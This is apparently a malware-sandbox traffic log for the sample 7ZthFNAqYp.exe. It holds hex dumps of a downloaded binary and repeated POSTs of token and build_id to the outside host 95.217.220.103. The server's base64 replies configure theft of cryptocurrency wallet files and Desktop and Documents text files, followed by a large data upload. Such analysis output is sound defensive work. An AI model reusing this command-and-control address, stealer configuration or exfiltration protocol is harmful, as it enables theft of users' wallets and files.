                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68
                                                                                                                                                                                                            Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08
                                                                                                                                                                                                            Data Ascii: Fd8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9
                                                                                                                                                                                                            Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83
                                                                                                                                                                                                            Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                            2024-10-23 05:03:56 UTC16384INData Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24
                                                                                                                                                                                                            Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.65000895.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:58 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEB
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 1025
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:58 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------FIIEGDBAEBFIIDHJJJEBCont
                                                                                                                                                                                                            2024-10-23 05:03:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:59 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.65000995.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:59 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFCFHJDBKJKEBFHJEHIICont
                                                                                                                                                                                                            2024-10-23 05:04:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:00 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:00 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.65001095.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:04:01 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:04:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------DGDAEHCBGIIJJJJKKKEHCont
                                                                                                                                                                                                            2024-10-23 05:04:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:01 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:01 UTC131INData Raw: 37 38 0d 0a 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 48 77 31 4d 48 78 30 63 6e 56 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 78ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTUVOVFMlXHwqLnR4dHw1MHx0cnVlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            21192.168.2.65001195.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:04:02 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 461
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:04:02 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------BAKJKFHCAEGDHIDGDHDACont
                                                                                                                                                                                                            2024-10-23 05:04:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:03 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            22192.168.2.65001295.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC282OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 109281
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------IDGDAAKFHIEHIECAFBAACont
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 41 44 70 51 4f 4f 39 4c 6a 4e 4a 69 67 59 55 6d 63 39 71 58 76 2f 41 44 6f 46 41 41 66 53 6b 2f 4b 6a 36 30 64 4b 42 69 59 2f 4c 32 6f 50 48 30 70 53 50 2f 31 30 68 47 44 32 6f 41 54 32 2f 6c 53 30 64 71 43 44 69 6b 46 7a 76 61 4b 4b 4b 67 2b 57 49 70 35 70 72 53 78 76 4c 32 48 55 62 66 54 70 30 43 32 39 72 50 63 4c 4b 79 2b 61 35 79 32 50 4c 52 6a 77 69 73 4f 6e 38 51 71 47 35 57 56 58 31 67 61 64 70 70 31 6f 4f 31 76 50 62 51 78 4e 49 69 69 33 6d 33 46 35 41 42 74 62 43 4d 4e 6d 54 67 4c 31 59 56 4a 50 70 30 55 73 59 76 35 6f 4e 30 53 79 69 48 7a 44 6a 41 66 47 63 65 76 53 71 6a 36 46 70 38 6a 46 6a 41 41 54 31 49 72 79 61 32 45 71 31 61 73 71 6c 4f 66 6c 38 75 78 37 32 47 78 39 47 68 52 6a 53 71 30 72 72 66 31 66 63 31 57 33 74 34 6a 31 55 78 61 62 4a
                                                                                                                                                                                                            Data Ascii: ADpQOO9LjNJigYUmc9qXv/ADoFAAfSk/Kj60dKBiY/L2oPH0pSP/10hGD2oAT2/lS0dqCDikFzvaKKKg+WIp5prSxvL2HUbfTp0C29rPcLKy+a5y2PLRjwisOn8QqG5WVX1gadpp1oO1vPbQxNIii3m3F5ABtbCMNmTgL1YVJPp0UsYv5oN0SyiHzDjAfGcevSqj6Fp8jFjAAT1Irya2Eq1asqlOfl8ux72Gx9GhRjSq0rrf1fc1W3t4j1UxabJ
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 30 72 6f 4b 6c 35 4f 71 2f 64 57 52 67 50 70 6d 73 44 78 49 41 62 43 49 39 78 4b 42 2b 68 72 58 4c 45 6b 6b 6e 4a 50 57 75 66 38 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 68 6a 36 6a 69 47 63 61 57 57 56 4f 62 71 6b 76 6e 64 47 46 53 63 30 74 46 66 74 5a 2b 52 68 52 52 52 51 42 33 75 73 6f 4c 32 66 77 5a 70 73 33 4e 74 4d 66 4e 6b 54 73 78 53 4e 53 41 66 62 6b 2f 6e 55 6e 6a 58 57 64 52 74 39 54 30 7a 53 4e 50 75 30 73 66 74 5a 4a 65 35 66 48 41 7a 67 44 50 62 2f 41 50 56 55 32 73 36 58 64 33 6e 68 76 52 37 2f 41 45 34 62 74 51 30 35 49 70 34 6b 2f 76 6a 61 4e 79 2f 6a 67 66 6c 69 6c 2b 30 2b 47 2f 48 57 6e 78 70 64 6c 46 6e 6a 35 4d 4c 76 73 6c 68 62 75 50 63 66 70 58 79 74 47 55 56 47 45 32 72 71
                                                                                                                                                                                                            Data Ascii: 0roKl5Oq/dWRgPpmsDxIAbCI9xKB+hrXLEkknJPWuf8RzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/hj6jiGcaWWVObqkvndGFSc0tFftZ+RhRRRQB3usoL2fwZps3NtMfNkTsxSNSAfbk/nUnjXWdRt9T0zSNPu0sftZJe5fHAzgDPb/APVU2s6Xd3nhvR7/AE4btQ05Ip4k/vjaNy/jgflil+0+G/HWnxpdlFnj5MLvslhbuPcfpXytGUVGE2rq
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 46 4a 34 6a 30 4f 4b 4f 36 6b 6b 31 6e 54 6b 6a 74 43 42 63 4d 31 30 67 45 4a 4c 46 51 48 4f 66 6c 2b 59 45 63 39 77 52 51 42 70 30 56 6d 54 65 4a 4e 43 74 78 41 5a 39 61 30 36 49 58 43 6f 30 4a 65 36 52 66 4e 44 35 32 46 63 6e 6b 4e 67 34 78 31 77 63 56 6b 33 58 6a 76 53 6b 6c 31 4b 33 74 4a 59 72 6d 38 30 2b 37 67 74 5a 34 42 4f 6f 50 37 78 34 30 4c 44 42 4a 77 70 6b 77 63 67 66 4d 70 48 76 52 31 73 42 31 4e 46 56 6b 31 43 79 6c 57 33 61 4f 37 74 33 57 35 4a 45 42 57 51 45 53 6b 41 6b 37 65 66 6d 34 42 50 48 6f 61 48 31 43 79 6a 38 33 66 65 57 36 2b 54 49 73 55 75 36 56 52 73 64 73 62 56 50 50 42 4f 35 63 41 39 64 77 39 61 41 4c 4e 46 5a 55 76 69 44 54 69 38 38 46 6e 71 57 6d 54 58 56 74 4b 6b 64 78 43 39 36 71 6d 4c 63 34 58 44 59 42 49 62 6e 41 42 41
                                                                                                                                                                                                            Data Ascii: FJ4j0OKO6kk1nTkjtCBcM10gEJLFQHOfl+YEc9wRQBp0VmTeJNCtxAZ9a06IXCo0Je6RfND52FcnkNg4x1wcVk3XjvSkl1K3tJYrm80+7gtZ4BOoP7x40LDBJwpkwcgfMpHvR1sB1NFVk1CylW3aO7t3W5JEBWQESkAk7efm4BPHoaH1Cyj83feW6+TIsUu6VRsdsbVPPBO5cA9dw9aALNFZUviDTi88FnqWmTXVtKkdxC96qmLc4XDYBIbnABA
